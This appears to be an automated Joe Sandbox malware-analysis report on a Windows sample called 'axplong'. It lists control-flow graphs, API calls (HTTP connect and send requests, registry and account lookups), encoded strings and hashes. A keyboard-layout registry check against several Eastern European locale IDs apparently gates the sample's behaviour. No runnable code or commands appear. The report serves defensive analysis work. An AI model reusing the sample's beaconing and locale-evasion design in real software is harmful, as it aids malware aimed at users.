                    control_flow_graph 843 22bd60-22bdac 844 22bdb2-22bdb6 843->844 845 22c1a1-22c1c6 call 237f30 843->845 844->845 847 22bdbc-22bdc0 844->847 850 22c1f4-22c20c 845->850 851 22c1c8-22c1d4 845->851 847->845 849 22bdc6-22be4f InternetOpenW InternetConnectA call 237870 call 225b20 847->849 874 22be53-22be6f 849->874 875 22be51 849->875 855 22c212-22c21e 850->855 856 22c158-22c170 850->856 853 22c1d6-22c1e4 851->853 854 22c1ea-22c1f1 call 23d593 851->854 853->854 861 22c26f-22c274 call 256b9a 853->861 854->850 863 22c224-22c232 855->863 864 22c14e-22c155 call 23d593 855->864 859 22c243-22c25f call 23cf21 856->859 860 22c176-22c182 856->860 866 22c188-22c196 860->866 867 22c239-22c240 call 23d593 860->867 863->861 872 22c234 863->872 864->856 866->861 876 22c19c 866->876 867->859 872->864 882 22bea0-22bf0f call 237870 call 225b20 call 237870 call 225b20 874->882 883 22be71-22be80 874->883 875->874 876->867 896 22bf13-22bf29 HttpSendRequestA 882->896 897 22bf11 882->897 884 22be82-22be90 883->884 885 22be96-22be9d call 23d593 883->885 884->885 885->882 898 22bf5a-22bf82 896->898 899 22bf2b-22bf3a 896->899 897->896 902 22bfb3-22bfd4 InternetReadFile 898->902 903 22bf84-22bf93 898->903 900 22bf50-22bf57 call 23d593 899->900 901 22bf3c-22bf4a 899->901 900->898 901->900 904 22bfda 902->904 906 22bf95-22bfa3 903->906 907 22bfa9-22bfb0 call 23d593 903->907 908 22bfe0-22c090 call 254180 904->908 906->907 907->902
                    APIs
                    • InternetOpenW.WININET(00278D70,00000000,00000000,00000000,00000000), ref: 0022BDED
                    • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0022BE11
                    • HttpSendRequestA.WININET(?,00000000), ref: 0022BF1A
                    • InternetReadFile.WININET(?,?,000003FF,?), ref: 0022BFCD
                    • InternetCloseHandle.WININET(?), ref: 0022C0A7
                    • InternetCloseHandle.WININET(?), ref: 0022C0AF
                    • InternetCloseHandle.WININET(?), ref: 0022C0B7
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandle$ConnectFileHttpOpenReadRequestSend
                    • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$d4($invalid stoi argument$stoi argument out of range
                    • API String ID: 3632815558-2609990668
                    • Opcode ID: 404221dde121a0ec0e13540bbf803bb1c22b1ba9516a39e8ffbb4ab14bbb45de
                    • Instruction ID: 2df86319e5bafba4d953f54cd336494646242990c042d3ca7d556aa0399f0350
                    • Opcode Fuzzy Hash: 404221dde121a0ec0e13540bbf803bb1c22b1ba9516a39e8ffbb4ab14bbb45de
                    • Instruction Fuzzy Hash: 45B108B0520128EBEB24DF68DC85BADBB79EF45304F604198F908972C1DB759AD4CF94

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1146 2265b0-226609 1220 22660a call 4ce01df 1146->1220 1221 22660a call 4ce01d8 1146->1221 1222 22660a call 4ce0256 1146->1222 1223 22660a call 4ce0216 1146->1223 1147 22660f-226688 LookupAccountNameA call 237870 call 225b20 1153 22668a 1147->1153 1154 22668c-2266ab call 222280 1147->1154 1153->1154 1157 2266dc-2266e2 1154->1157 1158 2266ad-2266bc 1154->1158 1161 2266e5-2266ea 1157->1161 1159 2266d2-2266d9 call 23d593 1158->1159 1160 2266be-2266cc 1158->1160 1159->1157 1160->1159 1163 226907 call 256b9a 1160->1163 1161->1161 1162 2266ec-226714 call 237870 call 225b20 1161->1162 1174 226716 1162->1174 1175 226718-226739 call 222280 1162->1175 1169 22690c call 256b9a 1163->1169 1173 226911-226916 call 256b9a 1169->1173 1174->1175 1180 22676a-22677e 1175->1180 1181 22673b-22674a 1175->1181 1186 226784-22678a 1180->1186 1187 226828-22684c 1180->1187 1182 226760-226767 call 23d593 1181->1182 1183 22674c-22675a 1181->1183 1182->1180 1183->1169 1183->1182 1189 226790-2267bd call 237870 call 225b20 1186->1189 1190 226850-226855 1187->1190 1204 2267c1-2267e8 call 222280 1189->1204 1205 2267bf 1189->1205 1190->1190 1191 226857-2268bc call 237f30 * 2 1190->1191 1201 2268e9-226906 call 23cf21 1191->1201 1202 2268be-2268cd 1191->1202 1206 2268df-2268e6 call 23d593 1202->1206 1207 2268cf-2268dd 1202->1207 1213 2267ea-2267f9 1204->1213 1214 226819-22681c 1204->1214 1205->1204 1206->1201 1207->1173 1207->1206 1216 2267fb-226809 1213->1216 1217 22680f-226816 call 23d593 1213->1217 1214->1189 1215 226822 1214->1215 1215->1187 1216->1163 1216->1217 1217->1214 1220->1147 1221->1147 1222->1147 1223->1147
                    APIs
                    • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00226650
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: AccountLookupName
                    • String ID: GVQsgL==$IVKsgL==$RBPleCSm
                    • API String ID: 1484870144-3856690409
                    • Opcode ID: 763c3535a9b4a9371259434acf08eb954019994fffd74d91f917f647304dc1ba
                    • Instruction ID: 97872df36a25615ea71f6b5cc748decf08d1f28eeef1f96023a021922ee65566
                    • Opcode Fuzzy Hash: 763c3535a9b4a9371259434acf08eb954019994fffd74d91f917f647304dc1ba
                    • Instruction Fuzzy Hash: 5F9105B2910128ABDF28DF64DC89BEDB779EB45304F4041E9E50897281DA319FD8CFA4
                    APIs
                      • Part of subcall function 00237870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0023795C
                      • Part of subcall function 00237870: __Cnd_destroy_in_situ.LIBCPMT ref: 00237968
                      • Part of subcall function 00237870: __Mtx_destroy_in_situ.LIBCPMT ref: 00237971
                      • Part of subcall function 0022BD60: InternetOpenW.WININET(00278D70,00000000,00000000,00000000,00000000), ref: 0022BDED
                      • Part of subcall function 0022BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0022BE11
                    • std::_Xinvalid_argument.LIBCPMT ref: 00234EA2
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectMtx_destroy_in_situOpenXinvalid_argumentstd::_
                    • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range$-(
                    • API String ID: 2549319220-1233442574
                    • Opcode ID: 3e8eca159fc3de515e7f58508a20a16c1c69724e60a3cb6bedafa3a9e5cafc0b
                    • Instruction ID: 4805becc479913f6f2f6252860d25341f7ffc28167bdcb0ac9c88e3bed06b265
                    • Opcode Fuzzy Hash: 3e8eca159fc3de515e7f58508a20a16c1c69724e60a3cb6bedafa3a9e5cafc0b
                    • Instruction Fuzzy Hash: AA2338B1D201589BEB19DB28CD4979DBB7A9F81304F5481D8E008AB2C6DB359FE4CF51

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 920 225df0-225eee 926 225ef0-225efc 920->926 927 225f18-225f25 call 23cf21 920->927 928 225f0e-225f15 call 23d593 926->928 929 225efe-225f0c 926->929 928->927 929->928 931 225f26-2260ad call 256b9a call 23e080 call 237f30 * 5 RegOpenKeyExA 929->931 949 2260b3-226143 call 254020 931->949 950 226478-226481 931->950 974 226466-226472 949->974 975 226149-22614d 949->975 951 226483-22648e 950->951 952 2264ae-2264b7 950->952 954 226490-22649e 951->954 955 2264a4-2264ab call 23d593 951->955 956 2264e4-2264ed 952->956 957 2264b9-2264c4 952->957 954->955 961 22659e-2265a3 call 256b9a 954->961 955->952 959 22651a-226523 956->959 960 2264ef-2264fa 956->960 963 2264c6-2264d4 957->963 964 2264da-2264e1 call 23d593 957->964 970 226525-226530 959->970 971 22654c-226555 959->971 967 226510-226517 call 23d593 960->967 968 2264fc-22650a 960->968 963->961 963->964 964->956 967->959 968->961 968->967 978 226542-226549 call 23d593 970->978 979 226532-226540 970->979 980 226582-22659d call 23cf21 971->980 981 226557-226566 971->981 974->950 984 226153-226187 RegEnumValueW 975->984 985 226460 975->985 978->971 979->961 979->978 982 226578-22657f call 23d593 981->982 983 226568-226576 981->983 982->980 983->961 983->982 990 22644d-226454 984->990 991 22618d-2261ad 984->991 985->974 990->984 995 22645a 990->995 997 2261b0-2261b9 991->997 995->985 997->997 998 2261bb-22624d call 237c50 call 238090 call 237870 * 2 call 225c60 997->998 998->990
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                    • API String ID: 0-3963862150
                    • Opcode ID: e2e48975e8dd3a82312bc31d134a03f101894e19b50e3c775e357873dc39833b
                    • Instruction ID: 6c14e3fd38a2f26bca83b3a230c05584e715e3c5199a7f6af0c273b81fcc613b
                    • Opcode Fuzzy Hash: e2e48975e8dd3a82312bc31d134a03f101894e19b50e3c775e357873dc39833b
                    • Instruction Fuzzy Hash: 9FE18D71910228BBEB24DFA4CC8DBDEB779AB04304F5042D9E509A7291DB74ABD4CF91

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1008 227d00-227d82 call 254020 1012 227d88-227db0 call 237870 call 225b20 1008->1012 1013 22827e-22829b call 23cf21 1008->1013 1020 227db2 1012->1020 1021 227db4-227dd6 call 237870 call 225b20 1012->1021 1020->1021 1026 227dda-227df3 1021->1026 1027 227dd8 1021->1027 1030 227e24-227e4f 1026->1030 1031 227df5-227e04 1026->1031 1027->1026 1034 227e80-227ea1 1030->1034 1035 227e51-227e60 1030->1035 1032 227e06-227e14 1031->1032 1033 227e1a-227e21 call 23d593 1031->1033 1032->1033 1038 22829c call 256b9a 1032->1038 1033->1030 1036 227ea3-227ea5 GetNativeSystemInfo 1034->1036 1037 227ea7-227eac 1034->1037 1040 227e62-227e70 1035->1040 1041 227e76-227e7d call 23d593 1035->1041 1042 227ead-227eb6 1036->1042 1037->1042 1049 2282a1-2282a6 call 256b9a 1038->1049 1040->1038 1040->1041 1041->1034 1047 227ed4-227ed7 1042->1047 1048 227eb8-227ebf 1042->1048 1053 22821f-228222 1047->1053 1054 227edd-227ee6 1047->1054 1051 227ec5-227ecf 1048->1051 1052 228279 1048->1052 1056 228274 1051->1056 1052->1013 1053->1052 1059 228224-22822d 1053->1059 1057 227ee8-227ef4 1054->1057 1058 227ef9-227efc 1054->1058 1056->1052 1057->1056 1061 227f02-227f09 1058->1061 1062 2281fc-2281fe 1058->1062 1063 228254-228257 1059->1063 1064 22822f-228233 1059->1064 1069 227fe9-2281e5 call 237870 call 225b20 call 237870 call 225b20 call 225c60 call 237870 call 225b20 call 225640 call 237870 call 225b20 call 237870 call 225b20 call 225c60 call 237870 call 225b20 call 225640 call 237870 call 225b20 call 237870 call 225b20 call 225c60 call 237870 call 225b20 call 225640 1061->1069 1070 227f0f-227f6b call 237870 call 225b20 call 237870 call 225b20 call 225c60 1061->1070 1067 228200-22820a 1062->1067 1068 22820c-22820f 1062->1068 1065 228265-228271 1063->1065 1066 228259-228263 1063->1066 1071 228235-22823a 1064->1071 1072 228248-228252 1064->1072 1065->1056 1066->1052 1067->1056 1068->1052 1074 228211-22821d 1068->1074 1107 2281eb-2281f4 1069->1107 1093 227f70-227f77 1070->1093 1071->1072 1076 22823c-228246 1071->1076 1072->1052 1074->1056 1076->1052 1095 227f7b-227f9b call 258a81 1093->1095 1096 227f79 1093->1096 1103 227fd2-227fd4 1095->1103 1104 227f9d-227fac 1095->1104 1096->1095 1106 227fda-227fe4 1103->1106 1103->1107 1108 227fc2-227fcf call 23d593 1104->1108 1109 227fae-227fbc 1104->1109 1106->1107 1107->1053 1111 2281f6 1107->1111 1108->1103 1109->1049 1109->1108 1111->1062
                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00227EA3
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                    • API String ID: 1721193555-2057465332
                    • Opcode ID: 9a02ff9fb4cde298d9742c94ce83399e98ee5d2fdabf86d51327e9e3f698045b
                    • Instruction ID: bd3796ca810e8cdeb4aad638d1430867371f10e037ea4e3701e8be885bd2e132
                    • Opcode Fuzzy Hash: 9a02ff9fb4cde298d9742c94ce83399e98ee5d2fdabf86d51327e9e3f698045b
                    • Instruction Fuzzy Hash: B9D11C70E25664E7DF14FBA8EC4A3AD7771AB42314F5042C8E805673C2DB758EA48BD2

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1224 256e01-256e36 GetFileType 1225 256e3c-256e47 1224->1225 1226 256eee-256ef1 1224->1226 1229 256e69-256e85 call 254020 GetFileInformationByHandle 1225->1229 1230 256e49-256e5a call 257177 1225->1230 1227 256ef3-256ef6 1226->1227 1228 256f1a-256f42 1226->1228 1227->1228 1231 256ef8-256efa 1227->1231 1233 256f44-256f57 1228->1233 1234 256f5f-256f61 1228->1234 1239 256f0b-256f18 call 25740d 1229->1239 1246 256e8b-256ecd call 2570c9 call 256f71 * 3 1229->1246 1242 256f07-256f09 1230->1242 1243 256e60-256e67 1230->1243 1238 256efc-256f01 call 257443 1231->1238 1231->1239 1233->1234 1247 256f59-256f5c 1233->1247 1237 256f62-256f70 call 23cf21 1234->1237 1238->1242 1239->1242 1242->1237 1243->1229 1260 256ed2-256eea call 257096 1246->1260 1247->1234 1260->1234 1263 256eec 1260->1263 1263->1242
                    APIs
                    • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00256E23
                    • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00256E7D
                    • __dosmaperr.LIBCMT ref: 00256F12
                      • Part of subcall function 00257177: __dosmaperr.LIBCMT ref: 002571AC
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: File__dosmaperr$HandleInformationType
                    • String ID:
                    • API String ID: 2531987475-0
                    • Opcode ID: 93b355d197c5429a27f20afc5ba650ff5921d5674354e8ea0c19549d09df3620
                    • Instruction ID: dfd0cad78f285938cffaa4e9e82169396e5094c4b88c3a76d905e1bd6e32598d
                    • Opcode Fuzzy Hash: 93b355d197c5429a27f20afc5ba650ff5921d5674354e8ea0c19549d09df3620
                    • Instruction Fuzzy Hash: A8416D75920205ABDB24EFB5E8499AFBBF9EF58301B10442DF857D3610EA30A818CB25

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1359 25d4f4-25d515 call 23deb0 1362 25d517 1359->1362 1363 25d52f-25d532 1359->1363 1364 25d54e-25d55a call 25a688 1362->1364 1365 25d519-25d51f 1362->1365 1363->1364 1366 25d534-25d537 1363->1366 1376 25d564-25d570 call 25d47e 1364->1376 1377 25d55c-25d55f 1364->1377 1368 25d521-25d525 1365->1368 1369 25d543-25d54c call 25d43c 1365->1369 1366->1369 1370 25d539-25d53c 1366->1370 1368->1364 1372 25d527-25d52b 1368->1372 1381 25d58c-25d595 1369->1381 1373 25d572-25d582 call 257443 call 256b8a 1370->1373 1374 25d53e-25d541 1370->1374 1372->1373 1378 25d52d 1372->1378 1373->1377 1374->1369 1374->1373 1376->1373 1391 25d584-25d589 1376->1391 1382 25d6cb-25d6da 1377->1382 1378->1369 1387 25d597-25d59f call 258c8b 1381->1387 1388 25d5a2-25d5b3 1381->1388 1387->1388 1389 25d5b5-25d5c7 1388->1389 1390 25d5c9 1388->1390 1395 25d5cb-25d5dc 1389->1395 1390->1395 1391->1381 1396 25d5de-25d5e0 1395->1396 1397 25d64a-25d65a call 25d687 1395->1397 1399 25d5e6-25d5e8 1396->1399 1400 25d6db-25d6dd 1396->1400 1407 25d65c-25d65e 1397->1407 1408 25d6c9 1397->1408 1402 25d5f4-25d600 1399->1402 1403 25d5ea-25d5ed 1399->1403 1404 25d6e7-25d6fa call 25651d 1400->1404 1405 25d6df-25d6e6 call 258cd3 1400->1405 1410 25d640-25d648 1402->1410 1411 25d602-25d617 call 25d4eb * 2 1402->1411 1403->1402 1409 25d5ef-25d5f2 1403->1409 1425 25d6fc-25d706 1404->1425 1426 25d708-25d70e 1404->1426 1405->1404 1414 25d660-25d676 call 25a531 1407->1414 1415 25d699-25d6a2 1407->1415 1408->1382 1409->1402 1416 25d61a-25d61c 1409->1416 1410->1397 1411->1416 1434 25d6a5-25d6a8 1414->1434 1415->1434 1416->1410 1419 25d61e-25d62e 1416->1419 1424 25d630-25d635 1419->1424 1424->1397 1429 25d637-25d63e 1424->1429 1425->1426 1430 25d73c-25d747 call 257443 1425->1430 1431 25d727-25d738 RtlAllocateHeap 1426->1431 1432 25d710-25d711 1426->1432 1429->1424 1443 25d749-25d74b 1430->1443 1436 25d713-25d71a call 259c81 1431->1436 1437 25d73a 1431->1437 1432->1431 1440 25d6b4-25d6bc 1434->1440 1441 25d6aa-25d6ad 1434->1441 1436->1430 1448 25d71c-25d725 call 258cf9 1436->1448 1437->1443 1440->1408 1446 25d6be-25d6c6 call 25a531 1440->1446 1441->1440 1445 25d6af-25d6b2 1441->1445 1445->1408 1445->1440 1446->1408 1448->1430 1448->1431
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: hpG%
                    • API String ID: 0-2132501797
                    • Opcode ID: 3afe949a7c24e1124eed90e84458ccd7348a2c5fa96bb878c2a71b43380296c3
                    • Instruction ID: d0415259968f615b60b17e3b98106ca44ef00b4382e3826ec56f1477a34856a9
                    • Opcode Fuzzy Hash: 3afe949a7c24e1124eed90e84458ccd7348a2c5fa96bb878c2a71b43380296c3
